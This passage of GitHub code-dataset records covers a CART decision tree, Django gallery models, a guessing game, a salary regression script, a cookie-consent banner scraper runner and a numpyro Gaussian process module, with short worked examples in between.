r_indices = indices[np.logical_not(pos)]\n return l_indices, r_indices\n\n def _shannon_entropy(self, unique, counts):\n prob = 1.0 * counts / np.sum(counts)\n return np.sum(- prob * np.log2(prob))\n\n def _calculate_split_entropy(self, samples, l_indices, r_indices):\n l_entropy = self._shannon_entropy(*np.unique(samples[l_indices,-1], return_counts=True))\n r_entropy = self._shannon_entropy(*np.unique(samples[r_indices,-1], return_counts=True))\n l_count, r_count = len(l_indices), len(r_indices)\n return 1.0 * (l_entropy * l_count + r_entropy * r_count) / (l_count + r_count)\n\n\n def _find_best_split(self, indices):\n unique, counts = np.unique(self._samples[indices, -1], return_counts=True)\n if len(unique) == 1:\n return None, unique[0]\n if len(indices) < self._min_split_size: # most frequent\n return None, unique[np.argmax(counts)]\n\n base_entropy = self._shannon_entropy(unique, counts)\n\n best_feat_idx = -1\n best_split_val = None # either numerical, or a list\n best_info_gain = 0.0\n sz = len(indices)\n for feat_idx in range(self._samples.shape[1] - 1):\n if feat_idx not in self._cate_feats:\n # numerical feature\n for split_value in np.unique(self._samples[indices, feat_idx]):\n l_indices, r_indices = self._binary_split(self._samples, indices, feat_idx, split_value)\n info_gain = base_entropy - self._calculate_split_entropy(self._samples, l_indices, r_indices)\n if info_gain > best_info_gain:\n #logging.info('{} feat #{} {} using {}: ig {:.6f} -> {:.6f}'.format(sz,\n # feat_idx, self._feat_names[feat_idx], split_value,\n # best_info_gain, info_gain))\n best_feat_idx = feat_idx\n best_split_val = split_value\n best_info_gain = info_gain\n continue\n\n # categorical feature\n cate_values = 
list(self._cate_feats[feat_idx].values())\n\n for a_cate in cate_values: # one-vs-(n-1)\n l_indices, r_indices = self._binary_split(self._samples, indices, feat_idx, [a_cate])\n if len(l_indices) == 0 or len(r_indices) == 0:\n continue\n info_gain = base_entropy - self._calculate_split_entropy(self._samples, l_indices, r_indices)\n if info_gain > best_info_gain:\n #logging.info('{} feat #{} {} using {}: ig {:.6f} -> {:.6f}'.format(sz,\n # feat_idx, self._feat_names[feat_idx], [a_cate],\n # best_info_gain, info_gain))\n best_feat_idx = feat_idx\n best_split_val = [a_cate] # list\n best_info_gain = info_gain\n\n if len(cate_values) > 5:\n continue\n\n for l in range(2, len(cate_values) // 2 + 1): # 1-4, 2-3, unnecessary 3-2 & 4-1\n for comb in itertools.combinations(cate_values, l):\n comb = list(comb)\n #logging.info('checking feat_idx {} comb {}'.format(feat_idx, comb))\n l_indices, r_indices = self._binary_split(self._samples, indices, feat_idx, comb)\n if len(l_indices) == 0 or len(r_indices) == 0:\n continue\n info_gain = base_entropy - self._calculate_split_entropy(self._samples, l_indices, r_indices)\n if info_gain > best_info_gain:\n #logging.info('{} feat #{} {} using {}: ig {:.6f} -> {:.6f}'.format(sz,\n # feat_idx, self._feat_names[feat_idx], comb,\n # best_info_gain, info_gain))\n best_feat_idx = feat_idx\n best_split_val = comb\n best_info_gain = info_gain\n\n if best_feat_idx < 0 or best_info_gain < self._min_split_info_gain:\n return None, unique[np.argmax(counts)] # most frequent\n else:\n return best_feat_idx, best_split_val\n\n def _recursive_tree(self, indices):\n feat, value = self._find_best_split(indices)\n if feat is None:\n return LeafNode(value, self._samples[indices,-1]) # value is model's response\n\n print('split at feat {} {} using {}'.format(feat, self._feat_names[feat], value))\n l_indices, r_indices = self._binary_split(self._samples,\n indices, feat, value)\n result = TreeNode(\n self._feat_names[feat],\n feat, value, len(indices),\n left=self._recursive_tree(l_indices),\n right=self._recursive_tree(r_indices))\n result._left._parent = result\n result._right._parent = result\n return result\n\nif __name__ == '__main__':\n import ds_heart\n import pprint\n log_setup.setup()\n feat_names, samples, idx2map = ds_heart.load_dataset()\n cart_classification = CartClassification()\n cart_classification.train(feat_names, samples, idx2map)\n pprint.pprint(cart_classification._cart_tree.to_string(), indent=4, width=100)\n","repo_name":"brianlions/ML-DNN-algo-crafting","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
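A worked example of the split criterion driving _find_best_split: the information gain of a candidate split is the parent's Shannon entropy minus the size-weighted entropy of the two children.

import numpy as np

def shannon_entropy(labels):
    _, counts = np.unique(labels, return_counts=True)
    p = counts / counts.sum()
    return float(np.sum(-p * np.log2(p)))

parent = np.array([0, 0, 0, 0, 1, 1, 1, 1])           # H(parent) = 1.0 bit
left, right = parent[:3], parent[3:]                  # [0,0,0] vs [0,1,1,1,1]
weighted = (len(left) * shannon_entropy(left)
            + len(right) * shannon_entropy(right)) / len(parent)
print(shannon_entropy(parent) - weighted)             # information gain ~= 0.5488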
+{"seq_id":"15864159174","text":"from django.db import models\nfrom django.conf import settings\n\nclass Gallery(models.Model):\n def to_client(self):\n image_set = Image.objects.filter(gallery=self)\n images_json = [image.to_client() for image in image_set]\n \n return {\n 'id': self.id,\n 'images': images_json\n }\n\nclass Image(models.Model):\n file = models.FileField(upload_to='documents/')\n\n gallery = models.ForeignKey(\n Gallery, \n on_delete=models.CASCADE, \n blank=True, \n null=True,\n related_name='images'\n )\n\n def to_client(self):\n votes = self.vote_set.all().count()\n return {\n 'url': self.file.url,\n 'id': self.id,\n 'votes': votes\n }\n\nclass Vote(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n gallery = models.ForeignKey(Gallery, on_delete=models.CASCADE)\n image = models.ForeignKey(Image, on_delete=models.CASCADE, default=None)\n\n class Meta:\n unique_together = ('user', 'gallery')\n\n def to_client(self):\n return {\n 'gallery': self.gallery.id,\n 'image': self.image.id,\n 'user': self.user.id\n }","repo_name":"natotthomer/galleries","sub_path":"galleries/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29205009736","text":"# The program below allows the player to guess\n# the number as many times as he/she wants.\n#\n# The program should let the player know whether to\n# guess higher or lower, and should print a message\n# when the guess is correct. A correct guess will\n# terminate the program.\n#\n# As an optional extra, allow the player to quit by entering\n# 0 (zero) for their guess.\n\nimport random\n\n\nhighest = 1000\nanswer = random.randint(1, highest)\n\nuser_input = int(input(\"Please enter a number between 1 and {0}: \".format(highest)))\nnumberOfGuesses = 1  # the first input already counts as a guess\nwhile user_input != answer:\n    if user_input == 0:\n        print(\"You aborted the game\")\n        break\n    if user_input > answer:\n        user_input = int(input(\"Please enter a lower number: \"))\n    else:\n        user_input = int(input(\"Please enter a higher number: \"))\n    numberOfGuesses += 1\nelse:\n    print(\"Congratulations, you spotted the correct answer after {0} guess(es).\".format(numberOfGuesses))\n","repo_name":"SMHosseinM/Python","sub_path":"Challenge3/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
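With the higher/lower hints, the optimal strategy is to halve the remaining interval on every turn, so any answer between 1 and 1000 is found in at most ceil(log2(1000)) = 10 guesses. A sketch of that strategy played automatically against a known answer:

low, high = 1, 1000
answer = 637        # illustrative; any value in range works
guesses = 0
while True:
    guess = (low + high) // 2   # always probe the midpoint
    guesses += 1
    if guess == answer:
        break
    elif guess < answer:
        low = guess + 1
    else:
        high = guess - 1
print("found in", guesses, "guesses")  # never more than 10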
+{"seq_id":"42716769287","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 28 21:43:59 2021\n\n@author: Andrew\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.neighbors import KNeighborsClassifier\nimport joblib\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV\nfrom sklearn.naive_bayes import GaussianNB\nfrom xgboost import XGBRegressor\n\n\ncwd = os.getcwd()\n\n\nfilepath = \"C:/Users/Andrew/Desktop/EdX/Self Projects/Classification/Data_entry/test\"\nos.chdir(filepath)\n\n#### Salary Estimate Regression Models\n\n### Step 1. Read the CSV file and factorize by job type\ndf = pd.read_csv(\"df_cleaned_new.csv\")\nfactor = pd.factorize(df['Job_Code'])\ndf['Job_Code'] = factor[0]\n\n### Step 2. Selecting meaningful dataset (columns)\ndf_sal =df[['avg_salary','Job_Code','python','masters', 'statistic', 'SQL', 'spark', 'AWS', 'Tableau', \n 'Hadoop', 'C_lang', 'Java', 'app', 'debug', 'HTML', 'object']]\n\n### Step 3. Define dependent and independent variables\nX_sal = df_sal.drop('avg_salary',axis=1)\ny_sal = df_sal[['avg_salary']].values\n\n### Step 4. Split train, test sets\nX_sal_train, X_sal_test, y_sal_train, y_sal_test = train_test_split(X_sal, y_sal, test_size=0.2, random_state=42)\n\n### Step 5. Try different modeling techniques for salary estimate regressor\nrf = RandomForestRegressor(n_estimators=80, criterion='mae', max_features='sqrt')\nrf.fit(X_sal_train,y_sal_train)\nrf.score(X_sal_train, np.ravel(y_sal_train))\nrf.score(X_sal_test, np.ravel(y_sal_test))\nmean_absolute_error(y_sal_test, rf.predict(X_sal_test))\n\nlm = linear_model.LinearRegression()\nlm.fit(X_sal_train,y_sal_train)\nlm.score(X_sal_train, np.ravel(y_sal_train))\nlm.score(X_sal_test, np.ravel(y_sal_test))\nmean_absolute_error(y_sal_test, lm.predict(X_sal_test))\n\nxgb = XGBRegressor(verbosity = 0)\nxgb.fit(X_sal_train,y_sal_train)\nxgb.score(X_sal_train, np.ravel(y_sal_train))\nxgb.score(X_sal_test, np.ravel(y_sal_test))\nmean_absolute_error(y_sal_test, xgb.predict(X_sal_test))\n\ncv_score = cross_val_score(xgb, X_sal_train,y_sal_train, cv=10)\n\n## Try tuning the hyperparameters in random forest regressor - this gives the lowest MAE\nn_estimators = [int(x) for x in np.linspace(start = 10, stop = 80, num = 10)]\nmax_features = ['auto','sqrt']\nmax_depth = [2,4]\nmin_samples_split = [2,5]\nmin_samples_leaf = [1,2]\nbootstrap = [True, False]\n\nparam_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n\n\nrf_Grid = GridSearchCV(estimator = rf, param_grid = param_grid, cv=3, verbose=2, n_jobs=4)\nrf_Grid.fit(X_sal_train, y_sal_train)\nrf_Grid.score(X_sal_train, y_sal_train)\nrf_Grid.score(X_sal_test,y_sal_test)\nmean_absolute_error(y_sal_test, rf_Grid.predict(X_sal_test))\n\n### Step 6. 
Results\n'''\nThe first approach, RandomForestRegressor with hyperparameter tuning, gave the best results.\nA possible explanation for the regressor's low performance is the nature of the salary data.\nSince the dataset was scraped from the Glassdoor website, where salaries are provided as a range,\nmany salary values may have been driven by the location (state) rather than by the job skills\nlisted in the job description. This may have weakened the correlation between job skills and salary.\n'''\n\n### Final Step. Pickle the model for productionization\nimport pickle\npickl = {'model2': rf_Grid}\npickle.dump( pickl, open( 'regressor' + \".p\", \"wb\" ) )\nfile_name = \"regressor.p\"\nwith open(file_name, 'rb') as pickled:\n    data = pickle.load(pickled)\n    job_cls = data['model2']","repo_name":"jbae42/Glassdoor_Job_Salary_Estimate","sub_path":"Model Building/Regression_SalaryEstimate.py","file_name":"Regression_SalaryEstimate.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
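Usage sketch for the pickled regressor: the feature values in the query row are made up, but the column list matches X_sal from the training script exactly (Job_Code plus the binary skill flags).

import pickle
import pandas as pd

with open("regressor.p", "rb") as fd:
    model = pickle.load(fd)["model2"]

# One query row; columns must match the training columns of X_sal.
row = pd.DataFrame(
    [[0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]],
    columns=['Job_Code', 'python', 'masters', 'statistic', 'SQL', 'spark', 'AWS',
             'Tableau', 'Hadoop', 'C_lang', 'Java', 'app', 'debug', 'HTML', 'object'])
print(model.predict(row))  # estimated average salary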
+{"seq_id":"74924832302","text":"from docopt import docopt\nfrom requests import Session\n\nimport os\nimport pickle\nimport logging\nfrom typing import Set, Dict\nfrom datetime import datetime\n\nfrom src.base_scraper import BaseScraper\nfrom src.cookiebot_scraper import CookiebotScraper\nfrom src.onetrust_scraper import OneTrustScraper\nfrom src.termly_scraper import TermlyScraper\n\nlogger = logging.getLogger(\"main\")\noutput_path = f\"./scrape_out_{datetime.now().strftime('%Y%m%d_%H%M%S')}\"\n\n\ndef add_stderr_to_logger(loglevel: str) -> None:\n \"\"\" Enables logging to stderr \"\"\"\n formatter = logging.Formatter('%(asctime)s :: %(name)s :: %(levelname)s :: %(message)s', datefmt=\"%Y-%m-%d-%H:%M:%S\")\n ch = logging.StreamHandler()\n ch.setLevel(loglevel)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n\ndef setupLogger(logdir: str, loglevel: str) -> None:\n \"\"\"\n Set up the logger instance, write to a log file.\n :param logdir: Directory for the log file.\n :param loglevel: Log level at which to record.\n \"\"\"\n loglevel = logging.getLevelName(loglevel)\n logger.setLevel(loglevel)\n formatter = logging.Formatter('%(asctime)s :: %(name)s :: %(levelname)s :: %(message)s', datefmt=\"%Y-%m-%d-%H:%M:%S\")\n\n os.makedirs(logdir, exist_ok=True)\n logfile = os.path.join(logdir, \"scrape_cl.log\")\n\n # log file output\n fh = logging.FileHandler(filename=logfile, mode=\"w\", encoding=\"utf8\")\n fh.setLevel(loglevel)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\ndef retrieve_urls(cargs: Dict) -> Set[str]:\n \"\"\"\n Retrieve URLs to be crawled from arguments.\n :param cargs: docopt arguments\n :return: set of unique urls, prefixed with HTTP prefix if needed\n \"\"\"\n sites: Set[str] = set()\n\n # retrieve URLs directly from command line\n for u in cargs[\"--url\"]:\n sites.add(u)\n\n # retrieve data from pickle files\n for p in cargs[\"--pkl\"]:\n if os.path.exists(p):\n with open(p, 'rb') as fd:\n contents = pickle.load(fd, encoding=\"utf-8\")\n for c in contents:\n sites.add(c)\n else:\n logger.error(f\"Provided pickle file path is invalid: \\\"{p}\\\"\")\n\n # retrieve urls from plaintext files, one url per line\n for fn in cargs[\"--file\"]:\n if os.path.exists(fn):\n with open(fn, 'r', encoding=\"utf-8\") as fd:\n for line in fd:\n sites.add(line.strip())\n else:\n logger.error(f\"Provided plaintext file path is invalid: \\\"{fn}\\\"\")\n\n # check correctness of URL and remove comment lines\n copy = sites.copy()\n while copy:\n url = copy.pop()\n if not url or len(url.strip()) == 0 or url.startswith(\"#\"):\n sites.remove(url)\n elif not url.lower().startswith(\"http://\") and not url.lower().startswith(\"https://\"):\n sites.remove(url)\n if cargs[\"--assume_http\"]:\n sites.add(\"http://\" + url)\n logger.debug(f\"Appended HTTP prefix to URL: \\\"{url}\\\"\")\n else:\n logger.warning(f\"Removed URL: \\\"{url}\\\" (missing http schema)\")\n\n return sites\n\n\ndef main():\n argv = None\n\n ## Some example sites to test the crawler on. 
Uncomment one line to test the extraction.\n # argv = [\"cookiebot\", \"--url\", \"https://purplemath.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"cookiebot\", \"--url\", \"https://gamefly.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.metabomb.net/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.maytag.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.aveda.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.equipmenttrader.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.tiffany.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"termly\", \"--url\", \"https://zoella.co.uk/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"termly\", \"--url\", \"https://www.dailystep.com/\", \"--loglevel\", \"DEBUG\"]\n\n # Initialize docopt, logger and get the arguments\n cargs = docopt(__doc__, argv=argv)\n setupLogger(logdir=output_path, loglevel=cargs[\"--loglevel\"].upper())\n add_stderr_to_logger(cargs[\"--loglevel\"].upper())\n sites = retrieve_urls(cargs)\n\n # abort if no sites specified\n if len(sites) == 0:\n logger.error(\"No URLs to crawl! Aborting...\")\n return 1\n\n scraper: BaseScraper\n if cargs[\"cookiebot\"]:\n logger.info(\"CookieBot provider selected\")\n scraper = CookiebotScraper(output_path, debug_mode=False)\n elif cargs[\"onetrust\"]:\n logger.info(\"OneTrust provider selected\")\n scraper = OneTrustScraper(output_path, debug_mode=False)\n elif cargs[\"termly\"]:\n logger.info(\"Termly provider selected\")\n scraper = TermlyScraper(output_path, debug_mode=False)\n else:\n logger.error(\"Unsupported Consent Management Provider\")\n return 2\n\n # Perform the crawl\n sess = Session()\n scraper.start_webdriver()\n comp_succ = comp_fail = 0\n total = len(sites)\n try:\n while sites:\n u = sites.pop()\n logger.info(f\"Crawling: {u}\")\n success_status = scraper.scrape_website(u, sess)\n if success_status:\n logger.info(f\"Crawl for site {u} completed successfully.\")\n comp_succ += 1\n else:\n logger.warning(f\"Crawl for site {u} failed!\")\n comp_fail += 1\n logger.info(\"%i/%i completed.\" % (comp_succ + comp_fail, total))\n\n except KeyboardInterrupt:\n logger.info(\"Execution has been cancelled by Keyboard Interrupt.\")\n os.makedirs(output_path, exist_ok=True)\n with open(os.path.join(output_path, \"uncrawled_urls.txt\"), 'w') as fd:\n for s in sites:\n fd.write(s + \"\\n\")\n finally:\n scraper.stop_webdriver()\n sess.close()\n\n logger.info(\"Crawl Completed. 
Success: %i/%i -- Failed: %i/%i\"\n % (comp_succ, total, comp_fail, total))\n\n # Dump crawl statistics and error information\n scraper.dump_crawl_statistics(os.path.join(output_path, \"crawl_statistics.csv\"))\n scraper.dump_full_error_info(os.path.join(output_path, \"error_info.txt\"))\n scraper.dump_failed_urls(os.path.join(output_path, \"failed_urls.txt\"))\n\n # Output collected data into a SQLite database\n sql_db = os.path.join(output_path, cargs[\"--dbname\"])\n scraper.setup_database(sql_db, \"./schema/schema.sql\")\n scraper.store_cookies_in_db()\n scraper.close_database()\n\n # cookie label output\n # label_path = os.path.join(output_path, \"cookie_labels.csv\")\n # src.dump_cookie_names_with_labels(label_path)\n\n logger.info(f\"Crawl data has been written to: {output_path}\")\n return 0\n\n\nif __name__ == \"__main__\":\n exit_code = main()\n exit(exit_code)\n","repo_name":"dibollinger/CookieBlock-Crawler-Prototype","sub_path":"run_scraper.py","file_name":"run_scraper.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"9547974617","text":"import inspect\n\nimport jax\nimport jax.numpy as jnp\nimport jax.random as random\nimport numpy as np\nimport numpyro as npy\nimport numpyro.distributions as dist\nfrom jax import vmap\nfrom jax.scipy.linalg import cholesky\nfrom numgp.cov import Constant, Covariance, Kron, WhiteNoise\nfrom numgp.math import cartesian, kron_dot, kron_solve_lower, kron_solve_upper\nfrom numgp.mean import Zero\nfrom numgp.util import infer_shape, solve_lower, solve_upper, stabilize\n\n\nclass Base:\n R\"\"\"\n Base class.\n \"\"\"\n\n def __init__(self, mean_func=Zero(), cov_func=Constant(0.0)):\n self.mean_func = mean_func\n self.cov_func = cov_func\n\n def __add__(self, other):\n same_attrs = set(self.__dict__.keys()) == set(other.__dict__.keys())\n if not isinstance(self, type(other)) or not same_attrs:\n raise TypeError(\"Cannot add different GP types\")\n mean_total = self.mean_func + other.mean_func\n cov_total = self.cov_func + other.cov_func\n return self.__class__(mean_total, cov_total)\n\n def prior(self, name, X, *args, **kwargs):\n raise NotImplementedError\n\n def marginal_likelihood(self, name, X, *args, **kwargs):\n raise NotImplementedError\n\n def conditional(self, name, Xnew, *args, **kwargs):\n raise NotImplementedError\n\n def predict(self, Xnew, point=None, given=None, diag=False):\n raise NotImplementedError\n\n\nclass Marginal(Base):\n R\"\"\"\n Marginal Gaussian process.\n The `gp.Marginal` class is an implementation of the sum of a GP\n prior and additive noise. It has `marginal_likelihood`, `conditional`\n and `predict` methods. This GP implementation can be used to\n implement regression on data that is normally distributed. For more\n information on the `prior` and `conditional` methods, see their docstrings.\n Parameters\n ----------\n cov_func: None, 2D array, or instance of Covariance\n The covariance function. Defaults to zero.\n mean_func: None, instance of Mean\n The mean function. Defaults to zero.\n Examples\n --------\n .. code:: python\n # A one dimensional column vector of inputs.\n X = np.linspace(0, 1, 10)[:, None]\n with pm.Model() as model:\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls=0.1)\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n # Place a GP prior over the function f.\n sigma = pm.HalfCauchy(\"sigma\", beta=3)\n y_ = gp.marginal_likelihood(\"y\", X=X, y=y, noise=sigma)\n ...\n # After fitting or sampling, specify the distribution\n # at new points with .conditional\n Xnew = np.linspace(-1, 2, 50)[:, None]\n with model:\n fcond = gp.conditional(\"fcond\", Xnew=Xnew)\n \"\"\"\n\n def __init__(self, name, mean_func=Zero(), cov_func=Constant(0.0)):\n super().__init__(mean_func, cov_func)\n self.name = name\n\n def _build_marginal_likelihood(self, X):\n mu = npy.deterministic(f\"{self.name}_mean\", self.mean_func(X))\n Kxx = npy.deterministic(f\"{self.name}_Kxx\", self.cov_func(X))\n Knx = npy.deterministic(f\"{self.name}_Knx\", self.noise(X))\n cov = Kxx + Knx\n return mu, cov\n\n def marginal_likelihood(self, X, y, noise, is_observed=True, **kwargs):\n R\"\"\"\n Returns the marginal likelihood distribution, given the input\n locations `X` and the data `y`.\n This is integral over the product of the GP prior and a normal likelihood.\n .. 
math::\n y \\mid X,\\theta \\sim \\int p(y \\mid f,\\, X,\\, \\theta) \\, p(f \\mid X,\\, \\theta) \\, df\n Parameters\n ----------\n name: string\n Name of the random variable\n X: array-like\n Function input values. If one-dimensional, must be a column\n vector with shape `(n, 1)`.\n y: array-like\n Data that is the sum of the function with the GP prior and Gaussian\n noise. Must have shape `(n, )`.\n noise: scalar, Variable, or Covariance\n Standard deviation of the Gaussian noise. Can also be a Covariance for\n non-white noise.\n is_observed: bool\n Whether to set `y` as an `observed` variable in the `model`.\n Default is `True`.\n **kwargs\n Extra keyword arguments that are passed to `MvNormal` distribution\n constructor.\n \"\"\"\n\n if not isinstance(noise, Covariance):\n self.noise = WhiteNoise(noise)\n else:\n self.noise = noise\n\n mu, cov = self._build_marginal_likelihood(X)\n _ = npy.deterministic(f\"{self.name}_y\", y)\n\n if is_observed:\n return npy.sample(\n f\"{self.name}\",\n dist.MultivariateNormal(loc=mu, covariance_matrix=cov),\n obs=y,\n )\n else:\n shape = infer_shape(X, kwargs.pop(\"shape\", None))\n return npy.sample(\n f\"{self.name}\", dist.MultivariateNormal(loc=mu, covariance_matrix=cov)\n )\n\n def _get_given_vals(self, given):\n if given is None:\n given = {}\n\n if \"gp\" in given:\n cov_total = given[\"gp\"].cov_func\n mean_total = given[\"gp\"].mean_func\n else:\n cov_total = self.cov_func\n mean_total = self.mean_func\n if all(val in given for val in [\"X\", \"y\", \"noise\"]):\n X, y, noise = given[\"X\"], given[\"y\"], given[\"noise\"]\n if not isinstance(noise, Covariance):\n noise = pm.gp.cov.WhiteNoise(noise)\n else:\n X, y, noise = self.X, self.y, self.noise\n return X, y, noise, cov_total, mean_total\n\n def _build_conditional(self, X=None, Xnew=None):\n # sets deterministic sites to sample from the condtional\n npy.deterministic(f\"{self.name}_Kss\", self.cov_func(Xnew))\n npy.deterministic(f\"{self.name}_Kns\", self.cov_func(Xnew))\n npy.deterministic(f\"{self.name}_Ksx\", self.cov_func(Xnew, X))\n npy.deterministic(f\"{self.name}_cond\", self.mean_func(Xnew))\n\n def conditional(self, X=None, Xnew=None):\n self._build_conditional(X, Xnew)\n return None\n\n\nclass LatentKron(Base):\n R\"\"\"\n Latent Gaussian process whose covariance is a tensor product kernel.\n The `gp.LatentKron` class is a direct implementation of a GP with a\n Kronecker structured covariance, without reference to any noise or\n specific likelihood. The GP is constructed with the `prior` method,\n and the conditional GP over new input locations is constructed with\n the `conditional` method. `conditional` and method. For more\n information on these methods, see their docstrings. This GP\n implementation can be used to model a Gaussian process whose inputs\n cover evenly spaced grids on more than one dimension. `LatentKron`\n is relies on the `KroneckerNormal` distribution, see its docstring\n for more information.\n Parameters\n ----------\n cov_funcs: list of Covariance objects\n The covariance functions that compose the tensor (Kronecker) product.\n Defaults to [zero].\n mean_func: None, instance of Mean\n The mean function. Defaults to zero.\n Examples\n --------\n .. 
code:: python\n # One dimensional column vectors of inputs\n X1 = np.linspace(0, 1, 10)[:, None]\n X2 = np.linspace(0, 2, 5)[:, None]\n Xs = [X1, X2]\n with pm.Model() as model:\n # Specify the covariance functions for each Xi\n cov_func1 = pm.gp.cov.ExpQuad(1, ls=0.1) # Must accept X1 without error\n cov_func2 = pm.gp.cov.ExpQuad(1, ls=0.3) # Must accept X2 without error\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.LatentKron(cov_funcs=[cov_func1, cov_func2])\n # ...\n # After fitting or sampling, specify the distribution\n # at new points with .conditional\n # Xnew need not be on a full grid\n Xnew1 = np.linspace(-1, 2, 10)[:, None]\n Xnew2 = np.linspace(0, 3, 10)[:, None]\n Xnew = np.concatenate((Xnew1, Xnew2), axis=1) # Not full grid, works\n Xnew = pm.math.cartesian(Xnew1, Xnew2) # Full grid, also works\n with model:\n fcond = gp.conditional(\"fcond\", Xnew=Xnew)\n \"\"\"\n\n def __init__(self, name, mean_func=Zero(), cov_funcs=(Constant(0.0))):\n try:\n self.cov_funcs = list(cov_funcs)\n except TypeError:\n self.cov_funcs = [cov_funcs]\n cov_func = Kron(self.cov_funcs)\n super().__init__(mean_func, cov_func)\n self.name = name\n\n def __add__(self, other):\n raise TypeError(\"Additive, Kronecker-structured processes not implemented\")\n\n def _build_prior(self, Xs, **kwargs):\n self.N = np.prod([len(X) for X in Xs])\n mu = self.mean_func(cartesian(Xs))\n chols = []\n for i, (cov, X) in enumerate(zip(self.cov_funcs, Xs)):\n Kxx = npy.deterministic(f\"{self.name}_Kxx_{i}\", cov(X))\n chol = cholesky(stabilize(Kxx), lower=True)\n chols.append(chol)\n\n # remove reparameterization option\n v = npy.sample(\n f\"{self.name}_rotated\",\n dist.Normal(loc=jnp.zeros(self.N), scale=jnp.ones(self.N), **kwargs),\n )\n f = npy.deterministic(self.name, mu + (kron_dot(chols, v)).reshape(-1))\n return f\n\n def prior(self, Xs, **kwargs):\n \"\"\"\n Returns the prior distribution evaluated over the input\n locations `Xs`.\n Parameters\n ----------\n name: string\n Name of the random variable\n Xs: list of array-like\n Function input values for each covariance function. Each entry\n must be passable to its respective covariance without error. The\n total covariance function is measured on the full grid\n `cartesian(*Xs)`.\n **kwargs\n Extra keyword arguments that are passed to the `KroneckerNormal`\n distribution constructor.\n \"\"\"\n if len(Xs) != len(self.cov_funcs):\n raise ValueError(\"Must provide a covariance function for each X\")\n f = self._build_prior(Xs, **kwargs)\n return f\n\n def _build_conditional(self, Xs=None, Xconds=None, **kwargs):\n # sets deterministic sites to sample from the condtional\n Xs = cartesian(Xs)\n Xconds = cartesian(Xconds)\n npy.deterministic(f\"{self.name}_mean\", self.mean_func(Xs))\n npy.deterministic(f\"{self.name}_cond\", self.mean_func(Xconds))\n npy.deterministic(f\"{self.name}_Kss\", self.cov_func(Xconds))\n npy.deterministic(f\"{self.name}_Ksx\", self.cov_func(Xconds, Xs))\n\n def conditional(self, Xs, Xnew, *args, **kwargs):\n self._build_conditional(Xs, Xnew)\n return None\n","repo_name":"sagar87/numgp","sub_path":"numgp/gp.py","file_name":"gp.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
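A structural usage sketch for the Marginal class inside a numpyro model. It assumes numgp's Constant covariance and WhiteNoise behave like ordinary kernels; a real model would replace the Constant placeholder with a proper kernel (e.g. an ExpQuad, if the package provides one):

import jax.numpy as jnp
import jax.random as random
import numpyro
import numpyro.distributions as dist
from numpyro.infer import MCMC, NUTS

def model(X, y):
    sigma = numpyro.sample("sigma", dist.HalfNormal(1.0))  # noise level to infer
    gp = Marginal("f", cov_func=Constant(1.0))             # placeholder kernel
    gp.marginal_likelihood(X, y, noise=sigma)

X = jnp.linspace(0.0, 1.0, 10)[:, None]
y = jnp.sin(X).ravel()
mcmc = MCMC(NUTS(model), num_warmup=200, num_samples=200)
mcmc.run(random.PRNGKey(0), X, y)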
